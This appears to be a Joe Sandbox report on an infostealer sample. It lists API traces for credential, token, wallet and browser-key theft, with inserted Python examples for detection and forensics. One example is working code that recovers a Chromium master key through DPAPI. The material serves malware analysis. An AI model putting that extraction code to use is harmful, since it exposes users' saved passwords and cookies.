                                  • Instruction ID: b34ec542afb362f1e91886898543b81da226c076c8b1a11999ef50f0e726c0db
                                  • Opcode Fuzzy Hash: 5f72df4e5335ef41dac79fcf5fa96272ef23702d70ca140699ec3ab7b1d00a8d
                                  • Instruction Fuzzy Hash: 3E41D130A00215EFDB15CF55DC88F9AB7B5FF48705F19C16AE9089B2D0D7719941CBA4
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00404759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00404769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0040477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004047AB
                                  • CloseHandle.KERNEL32(00000000), ref: 004047B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004047C0
                                  • CloseHandle.KERNEL32(00000000), ref: 004047CB
Memory Dump Source
• Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: same associated dump regions as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 187d78a2ccb52423784780adf889e363b3a58083fbe433c5fdbbabebaf087c68
                                  • Instruction ID: 7919b0eb3ed874933f987fb57d2012bef17d72db5a85f93ded8426bc286c9be9
                                  • Opcode Fuzzy Hash: 187d78a2ccb52423784780adf889e363b3a58083fbe433c5fdbbabebaf087c68
                                  • Instruction Fuzzy Hash: 1F01B9B15012146FE7205B709C89FEB77BDEB88752F045196FA09E21C0DF748D808AA5
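The function blocks above are the raw material an analyst turns into detections: registry value enumeration under HKEY_CURRENT_USER with a StrStrA search for "Password" and a CryptUnprotectData subcall (DPAPI-protected credentials being decrypted), a WinINet download read into a heap buffer, a Toolhelp32 process walk ending in OpenProcess(0x1)/TerminateProcess, and a lookup of wallet_path under SOFTWARE\monero-project\monero-core. The script below is an added example, not part of the Joe Sandbox report or its signature engine. It parses trace lines in the format printed above, decodes the hex constants that the report leaves raw (0x80000001 = HKEY_CURRENT_USER, 0x20119 = KEY_READ|KEY_WOW64_64KEY, OpenProcess access 0x1 = PROCESS_TERMINATE, InternetOpenUrlA flags 0x04000100 = INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE, CryptUnprotectData flag 0x1 = CRYPTPROTECT_UI_FORBIDDEN), and tags each function block with a behaviour label. The rule names are this example's own choice, and SAMPLE is constructed input copied from the four blocks above.

```python
"""Tag Joe Sandbox API-trace lines with behaviours.

Added example, not report content: SAMPLE copies trace lines from this report's
function blocks as constructed input; the rules and constant tables are assumptions.
"""
import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Win32 constants that the report prints as raw hex.
HKEY = {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"}
REG_ACCESS = {"00020019": "KEY_READ", "00020119": "KEY_READ|KEY_WOW64_64KEY"}
PROC_ACCESS = {"00000001": "PROCESS_TERMINATE"}
INET_NO_CACHE_WRITE, INET_PRAGMA_NOCACHE = 0x04000000, 0x00000100

@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""   # parent address when the line is "Part of subcall function"

def parse_trace(text: str) -> list:
    """One Call per '• Api.Module(args), ref: addr' line; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"] or ""))
    return calls

def decode(call: Call) -> dict:
    """Turn raw hex arguments of a few security-relevant APIs into symbolic names."""
    a = call.args
    if call.api == "RegOpenKeyExA" and len(a) >= 4:
        return {"root": HKEY.get(a[0], a[0]), "access": REG_ACCESS.get(a[3], a[3])}
    if call.api == "OpenProcess" and a:
        return {"access": PROC_ACCESS.get(a[0], a[0])}
    if call.api == "CryptUnprotectData" and len(a) >= 6:
        return {"ui_forbidden": a[5] == "00000001"}  # CRYPTPROTECT_UI_FORBIDDEN
    if call.api == "InternetOpenUrlA" and len(a) >= 5:
        flags = int(a[4], 16)
        return {"no_cache_write": bool(flags & INET_NO_CACHE_WRITE),
                "pragma_nocache": bool(flags & INET_PRAGMA_NOCACHE)}
    return {}

# (label, APIs that must all appear in the block, extra predicate over its calls)
RULES = [
    ("process_kill_loop",
     {"CreateToolhelp32Snapshot", "Process32Next", "OpenProcess", "TerminateProcess"},
     lambda cs: any(decode(c).get("access") == "PROCESS_TERMINATE" for c in cs)),
    ("dpapi_credential_harvest", {"RegEnumValueA", "CryptUnprotectData"},
     lambda cs: any(c.api == "StrStrA" and "Password" in c.args for c in cs)),
    ("wininet_download", {"InternetOpenUrlA", "InternetReadFile"}, lambda cs: True),
    ("crypto_wallet_registry_lookup", {"RegQueryValueExA"},
     lambda cs: any("wallet_path" in c.args for c in cs)),
]

def classify(calls: list) -> list:
    names = {c.api for c in calls}
    return [label for label, need, pred in RULES if need <= names and pred(calls)]

def split_blocks(text: str) -> list:
    """Each 'APIs' heading in the report starts a new function block."""
    blocks = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
        elif blocks:
            blocks[-1].append(line)
    return ["\n".join(b) for b in blocks]

def analyse(text: str) -> list:
    return [classify(parse_trace(b)) for b in split_blocks(text)]

SAMPLE = r"""
APIs
• RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003E784A
• StrStrA.SHLWAPI(?,Password), ref: 003E78B8
  • Part of subcall function 003E7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003E778D
APIs
• InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 003E5692
• InternetReadFile.WININET(?,?,00000400,00000001), ref: 003E56BC
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00404759
• Process32Next.KERNEL32(00000000,00000128), ref: 0040477B
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040479C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 004047AB
APIs
• RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003E1159
• RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003E1173
"""
```

Run `analyse(SAMPLE)` to get one label list per block. The rules key on API combinations plus one decoded argument each, so a block that calls OpenProcess with a broader access mask, or enumerates registry values without touching DPAPI, does not match; extend RULES rather than the parser when adding behaviours from other blocks of this report.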
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F8435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F846C
                                  • lstrlen.KERNEL32(00000000), ref: 003F84B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F84E9
                                  • lstrlen.KERNEL32(00000000), ref: 003F84FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F852E
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F853E
Memory Dump Source
• Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: same associated dump regions as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 2da1691ed43cd865383d306e8aced3d1146adc7abd85f16c580d35ddf6369a31
                                  • Instruction ID: 321f863323b0c4610dd2ce09facf99831a9f7f009f33787c1e188f10badddf15
                                  • Opcode Fuzzy Hash: 2da1691ed43cd865383d306e8aced3d1146adc7abd85f16c580d35ddf6369a31
                                  • Instruction Fuzzy Hash: 3D51D67590020A9FCB2ADF29D884AABB7F9EF49700F158459ED49DB245EF30E941CB50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00402925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,0119BDD8,00000000,00020119,004028A9), ref: 0040294B
                                  • RegQueryValueExA.ADVAPI32(004028A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00402965
                                  • RegCloseKey.ADVAPI32(004028A9), ref: 0040296F
                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: same associated dump regions as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: d9e07dcb660df9c9326f0dfe88f53e7ff8ccf5b30fd62a1aa1577cfa2f387660
                                  • Instruction ID: 6ffa8155fc11c599d146f08e3747a76b64a36ace29df36605fc667696f7ef80e
                                  • Opcode Fuzzy Hash: d9e07dcb660df9c9326f0dfe88f53e7ff8ccf5b30fd62a1aa1577cfa2f387660
                                  • Instruction Fuzzy Hash: A901B1B5A00215AFD310CBA49C59FEB7BADEB48755F14405AFE45E7280EA715A0487A0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00402895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040289C
                                    • Part of subcall function 00402910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00402925
                                    • Part of subcall function 00402910: RtlAllocateHeap.NTDLL(00000000), ref: 0040292C
                                    • Part of subcall function 00402910: RegOpenKeyExA.ADVAPI32(80000002,0119BDD8,00000000,00020119,004028A9), ref: 0040294B
                                    • Part of subcall function 00402910: RegQueryValueExA.ADVAPI32(004028A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00402965
                                    • Part of subcall function 00402910: RegCloseKey.ADVAPI32(004028A9), ref: 0040296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,0119BDD8,00000000,00020119,003F9500), ref: 004028D1
                                  • RegQueryValueExA.ADVAPI32(003F9500,011B0220,00000000,00000000,00000000,000000FF), ref: 004028EC
                                  • RegCloseKey.ADVAPI32(003F9500), ref: 004028F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 8e4fa726842a08e5f2b7e304ef5c1b1b9231aacae58639f3739fe7c5ee5afc01
                                  • Instruction ID: b400b914118ff7a921336c6dc396952341439da07d132354f2dcb7c6c888f3a1
                                  • Opcode Fuzzy Hash: 8e4fa726842a08e5f2b7e304ef5c1b1b9231aacae58639f3739fe7c5ee5afc01
                                  • Instruction Fuzzy Hash: C501F775A00208BFD710DBA4AC4DFEA772EEB44306F04815AFE08D3280DA705A4087A0
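The two routines above read the CurrentBuildNumber value under HKEY_LOCAL_MACHINE (0x80000002 in the trace) and then compare the result against OS name strings such as "Windows 11": the classic stealer host-fingerprint step that lands in the exfiltrated "system info" record. The access mask 0x20119 in the RegOpenKeyExA call is KEY_READ | KEY_WOW64_64KEY, i.e. this 32-bit binary deliberately reads the 64-bit registry view. The following is an added example, not code from the sample or from Joe Sandbox, that reproduces the lookup and the mapping. Two assumptions: the key path (the string at 0119BDD8 is not decoded in the report, so the standard Windows NT\CurrentVersion location is assumed) and the build-to-name table, which is a practitioner's table, not the sample's.

```python
"""OS fingerprint from the CurrentBuildNumber registry value.

Added example (not code from the sample or from Joe Sandbox). Reproduces
RegOpenKeyExA(HKLM, ...) -> RegQueryValueExA("CurrentBuildNumber") -> map
to a product name such as "Windows 11". The key path and the
build-to-name table are assumptions; the report only shows the value
name and the "Windows 11" string.
"""
import sys
from typing import Optional

# HKEY_LOCAL_MACHINE is 0x80000002 in the trace. This is the standard
# location of CurrentBuildNumber (assumed; not decoded in the report).
CURRENT_VERSION_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"

# Build-number thresholds to marketing names (assumed table; the sample's
# own mapping is not visible in the report).
_BUILD_TABLE = [
    (22000, "Windows 11"),
    (10240, "Windows 10"),
    (9600, "Windows 8.1"),
    (9200, "Windows 8"),
    (7600, "Windows 7"),
    (6000, "Windows Vista"),
]


def os_name_from_build(build: str) -> str:
    """Map a CurrentBuildNumber string (e.g. "22631") to a product name."""
    try:
        number = int(build.strip())
    except (ValueError, AttributeError):
        return "Unknown"
    for threshold, name in _BUILD_TABLE:
        if number >= threshold:
            return name
    return "Unknown"


def read_current_build_number() -> Optional[str]:
    """Read the same value the sample reads; returns None off Windows."""
    if sys.platform != "win32":
        return None
    import winreg  # only importable on Windows

    # 0x20119 in the trace = KEY_READ (0x20019) | KEY_WOW64_64KEY (0x100)
    access = winreg.KEY_READ | winreg.KEY_WOW64_64KEY
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CURRENT_VERSION_KEY,
                        0, access) as key:
        value, _kind = winreg.QueryValueEx(key, "CurrentBuildNumber")
    return str(value)


if __name__ == "__main__":
    # "22631" is a constructed fallback so the script also runs off Windows.
    build = read_current_build_number() or "22631"
    print(f"CurrentBuildNumber={build} -> {os_name_from_build(build)}")
```

For detection, the registry read itself is unremarkable (countless legitimate programs do it); what is worth alerting on is this read followed, in the same process, by the browser-profile and token-file access traced further down, which is the sequence a stealer runs before its first C2 POST.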
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 003E723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 003E7279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E7280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003E72C3
                                  • HeapFree.KERNEL32(00000000), ref: 003E72CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003E7329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: b36fc0178240e35832194b55d56e6c90237617275f1d119547b17f995700946f
                                  • Instruction ID: 782ad69e4ae83d48d43478e5dbce53eaa487c9f630c62978b6965670c351f22d
                                  • Opcode Fuzzy Hash: b36fc0178240e35832194b55d56e6c90237617275f1d119547b17f995700946f
                                  • Instruction Fuzzy Hash: 7B4181757047469BDB61CF6ADC84BAAB3E9FB88305F144669ED4DC7380E631E900DB90
                                  APIs
                                  • memset.MSVCRT ref: 003FD7D6
                                  • RegOpenKeyExA.ADVAPI32(80000001,011AF398,00000000,00020119,?), ref: 003FD7F5
                                  • RegQueryValueExA.ADVAPI32(?,011B0580,00000000,00000000,00000000,000000FF), ref: 003FD819
                                  • RegCloseKey.ADVAPI32(?), ref: 003FD823
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FD848
                                  • lstrcat.KERNEL32(?,011B0598), ref: 003FD85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 4513de290ddfa56a345dbbe430ce1fa955256eafd2886b5874f932c9b424e445
                                  • Instruction ID: 9099811b27ef0198ef615017ba795d86d9bb67772a3790874aa4883c9e252a0e
                                  • Opcode Fuzzy Hash: 4513de290ddfa56a345dbbe430ce1fa955256eafd2886b5874f932c9b424e445
                                  • Instruction Fuzzy Hash: 02418271A1025C9FCB55EF64EC86BDE777AAB44304F008165B6099B291EF30AA89CFD1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003E9CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003E9CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003E9D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: c319d50b847eac4861e339e3607eb2fc1d8e40d8aecb95b6a9d5656e671dbd6b
                                  • Instruction ID: 61878cee859f12e1b5a93f661257bbabb7a24c724194d4b9a60f64140746d33f
                                  • Opcode Fuzzy Hash: c319d50b847eac4861e339e3607eb2fc1d8e40d8aecb95b6a9d5656e671dbd6b
                                  • Instruction Fuzzy Hash: 9D41B372A002A99BCB23EF66DC417EF77B4AF54304F054666E915AB3D2DA70AD00C790
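The StrStrA call searching for "encrypted_key":", together with the "DPAPI" string in the same routine, is the Chromium master-key extraction step: the browser's Local State JSON file (normally %LOCALAPPDATA%\<vendor>\<browser>\User Data\Local State) carries os_crypt.encrypted_key as base64; the decoded bytes begin with the literal "DPAPI" and the remainder is a CryptProtectData blob bound to the logged-on user. Stealers call CryptUnprotectData on the victim host precisely because that blob cannot be opened anywhere else. The following is an added example, not the sample's code, that parses a constructed Local State, strips the prefix, validates the DPAPI blob header and, on Windows only, performs the unprotect call via ctypes. The sample input is constructed; the GUID check uses the documented CryptProtectData provider GUID. Caveat: Chrome 127 and later additionally store an app-bound key (os_crypt.app_bound_encrypted_key, prefix "APPB") for cookies; the routine traced here only looks for the classic encrypted_key.

```python
"""Chromium "Local State" master-key extraction, as stealers perform it.

Added example (not code from the sample or from Joe Sandbox). The traced
routine searches Local State for "encrypted_key":" and carries the string
"DPAPI"; that matches the documented os_crypt layout. The Local State
content built by build_sample_local_state() is constructed for the demo.
"""
import base64
import json
import sys
from typing import Optional

DPAPI_PREFIX = b"DPAPI"
# CryptProtectData blobs start with version 1 followed by the provider
# GUID {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB}, serialised little-endian.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000D08C9DDF0115D1118C7A00C04FC297EB")


def extract_encrypted_key(local_state_bytes: bytes) -> Optional[bytes]:
    """Return the raw DPAPI blob from os_crypt.encrypted_key, or None.

    Returns None for non-JSON input, a missing key, bad base64, or a
    value that is not DPAPI-prefixed (e.g. an "APPB" app-bound key).
    """
    try:
        state = json.loads(local_state_bytes.decode("utf-8"))
        decoded = base64.b64decode(state["os_crypt"]["encrypted_key"])
    except (ValueError, KeyError, TypeError):
        return None
    if not decoded.startswith(DPAPI_PREFIX):
        return None
    return decoded[len(DPAPI_PREFIX):]


def looks_like_dpapi_blob(blob: bytes) -> bool:
    """Cheap sanity check before handing the bytes to CryptUnprotectData."""
    return blob.startswith(DPAPI_BLOB_MAGIC)


def unprotect_master_key(blob: bytes) -> Optional[bytes]:
    """Windows only: CryptUnprotectData under the current user's DPAPI.

    Returns the 32-byte AES-GCM master key on success, None elsewhere or
    if the blob belongs to a different user / machine.
    """
    if sys.platform != "win32":
        return None
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD),
                    ("pbData", ctypes.POINTER(ctypes.c_char))]

    crypt32 = ctypes.WinDLL("crypt32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    in_blob = DATA_BLOB(len(blob), ctypes.create_string_buffer(blob, len(blob)))
    out_blob = DATA_BLOB()
    ok = crypt32.CryptUnprotectData(ctypes.byref(in_blob), None, None, None,
                                    None, 0, ctypes.byref(out_blob))
    if not ok:
        return None
    try:
        return ctypes.string_at(out_blob.pbData, out_blob.cbData)
    finally:
        kernel32.LocalFree(out_blob.pbData)  # CryptUnprotectData allocates it


def build_sample_local_state(blob: bytes, prefix: bytes = DPAPI_PREFIX) -> bytes:
    """Constructed Local State file for the demo (not from a real profile)."""
    encoded = base64.b64encode(prefix + blob).decode("ascii")
    return json.dumps({"os_crypt": {"encrypted_key": encoded}}).encode("utf-8")


if __name__ == "__main__":
    # Constructed blob: correct header, dummy body (not a real key).
    sample = build_sample_local_state(DPAPI_BLOB_MAGIC + bytes(32))
    blob = extract_encrypted_key(sample)
    print("dpapi blob header ok:", blob is not None and looks_like_dpapi_blob(blob))
    print("master key:", unprotect_master_key(blob) if blob else None)
```

From a forensics standpoint the same parse, run against a suspect host's Local State, tells you which browsers had a recoverable master key at the time of infection, which is what decides whether stored passwords and cookies should be treated as compromised.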
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FEA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FEA61
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FEA7A
                                  • lstrcat.KERNEL32(?,011A8958), ref: 003FEA8D
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FEA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: b38ed7c02696f33c7713a1ff7a2234c09d89ebce008f758ec6b5563c74a7291a
                                  • Instruction ID: 949d5b45e35b0c37088e720d2bfce1192674b976fd9af53d87f38b65374fdb47
                                  • Opcode Fuzzy Hash: b38ed7c02696f33c7713a1ff7a2234c09d89ebce008f758ec6b5563c74a7291a
                                  • Instruction Fuzzy Hash: 1441A971D1011CAFCB16EB64DC42FEE7379BF48300F045569BA1A9B2D1DE749E448B50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FECDF
                                  • lstrlen.KERNEL32(00000000), ref: 003FECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FED1D
                                  • lstrlen.KERNEL32(00000000), ref: 003FED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003FED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: a921b9f0e94f60744abadbef9132eecf762c45e3dd36a847515d438c97b6996d
                                  • Instruction ID: 4559f145a751fdbf2420a667f2e9f2325a01a4304cde9f7d20f0593919738157
                                  • Opcode Fuzzy Hash: a921b9f0e94f60744abadbef9132eecf762c45e3dd36a847515d438c97b6996d
                                  • Instruction Fuzzy Hash: 8C318D32A101A95FC723BB79E84AAAF7769AF40700F055230F905DF2A2DF74DD168791
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,003E140E), ref: 003E9A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,003E140E), ref: 003E9AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,003E140E), ref: 003E9AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,003E140E,00000000,?,?,?,003E140E), ref: 003E9AE0
                                  • LocalFree.KERNEL32(?,?,?,?,003E140E), ref: 003E9B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,003E140E), ref: 003E9B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 89280e4b1bfe13f4db93435eed82d98f532cfa9bf351cee3d6691d3476b709ad
                                  • Instruction ID: 99b9e475002c077bd0ec0a39cf9e167a49539aa860c47d2e5b86835a4b590d81
                                  • Opcode Fuzzy Hash: 89280e4b1bfe13f4db93435eed82d98f532cfa9bf351cee3d6691d3476b709ad
                                  • Instruction Fuzzy Hash: FA115E7160021AEFE711DFAADCC8BAA736DEF04340F15426AF901A7280EB709D40CBA0
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405B14
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00405B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00405B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00405B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: 62bdcfbdddb8aedae7dd264e9fb216e42679148d7f1b892d483b177f4e4eabfa
                                  • Instruction ID: f632658816675b03ff2aa9ae6529f8706c40e0f679db4f0cd5e01e6337e63ed5
                                  • Opcode Fuzzy Hash: 62bdcfbdddb8aedae7dd264e9fb216e42679148d7f1b892d483b177f4e4eabfa
                                  • Instruction Fuzzy Hash: 41417271B005199FCF18DF6CC995AAEBBB5EB89310F15823AE919E7384D634ED008B94
                                  APIs
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 14ade87c2a522afc8d79fadadd9087f630a2d2c8503a51f91a9ecf6212c9ee27
                                  • Instruction ID: 84a129b66d317aff696c75b9897652a4e50e9b796dfe5d6081c8657069597834
                                  • Opcode Fuzzy Hash: 14ade87c2a522afc8d79fadadd9087f630a2d2c8503a51f91a9ecf6212c9ee27
                                  • Instruction Fuzzy Hash: 274116B050474CAEEB218B248D84FFB7BF89B45308F1448FDE986A61C3D2759E458F28
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7D58
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1D5
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7D91
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: cac4a14b93f354f0de60fa1e77d0a6bf821151fa4d1dd042a02da263b9414543
                                  • Instruction ID: 369258ed50fb435268ee4dd597ba83f5465929e8a11b604fa24a9d54db278df5
                                  • Opcode Fuzzy Hash: cac4a14b93f354f0de60fa1e77d0a6bf821151fa4d1dd042a02da263b9414543
                                  • Instruction Fuzzy Hash: A421E4323183088BD722DE2CD880A3AF7E5AFA1750B614A2EF5528B381D770DC4083A5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004033EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 004033F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00403411
                                  • wsprintfA.USER32 ref: 00403437
